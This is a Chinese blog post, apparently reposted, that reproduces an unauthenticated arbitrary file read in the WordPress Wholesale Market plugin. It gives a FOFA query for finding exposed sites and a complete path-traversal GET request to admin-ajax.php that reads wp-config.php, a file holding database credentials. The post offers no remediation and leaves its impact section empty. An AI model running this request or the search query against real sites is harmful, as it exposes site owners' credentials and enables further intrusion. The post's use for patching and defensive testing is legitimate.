当前位置:   article > 正文

【漏洞复现】WordPress_Wholesale_Market admin-ajax.php 任意文件读取漏洞

【漏洞复现】WordPress_Wholesale_Market admin-ajax.php 任意文件读取漏洞

0x01 产品简介

WordPress Wholesale Market是一个WordPress主题,专门设计用于创建批发市场和在线商城网站。该主题提供了许多功能和设计元素,使您能够轻松地构建一个功能强大的批发市场平台,以满足批发商和零售商的需求。

0x02 漏洞概述

WordPress Wholesale Market存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器文件,造成敏感信息泄露。

0x03 测绘语句

fofa: body="wp-content/plugins/wholesale-market"

0x04 漏洞复现

GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1

0x05 影响范围

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/从前慢现在也慢/article/detail/499990
推荐阅读
相关标签
  

闽ICP备14008679号